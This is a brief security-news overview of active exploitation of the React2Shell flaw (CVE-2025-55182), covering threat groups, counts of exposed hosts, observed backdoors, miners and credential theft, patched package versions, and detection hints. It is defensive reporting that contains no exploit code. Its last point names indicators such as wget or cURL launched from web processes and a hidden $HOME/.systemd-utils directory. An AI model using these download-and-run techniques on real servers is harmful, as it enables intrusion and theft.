Overview
- Google’s Threat Intelligence Group said at least five additional China-linked espionage teams are exploiting CVE-2025-55182, with Iran-nexus and financially motivated actors also active.
- Shadowserver reports more than 116,000 internet-facing IPs vulnerable to React2Shell, and GreyNoise observed over 670 unique hosts attempting exploitation in the past 24 hours.
- Incident responders have documented deployments of backdoors, tunneling tools, and XMRig miners, as well as theft of AWS configuration files and other credentials on compromised cloud servers.
- Security Alliance warned that compromised crypto sites are serving wallet-draining scripts and urged operators to review front-end assets for unfamiliar or obfuscated JavaScript.
- Fixes are available in react-server-dom packages 19.0.1, 19.1.2, and 19.2.1 and in Next.js updates, with platform WAF rules offered as temporary mitigations while defenders monitor for wget or cURL from web processes and hidden directories such as $HOME/.systemd-utils.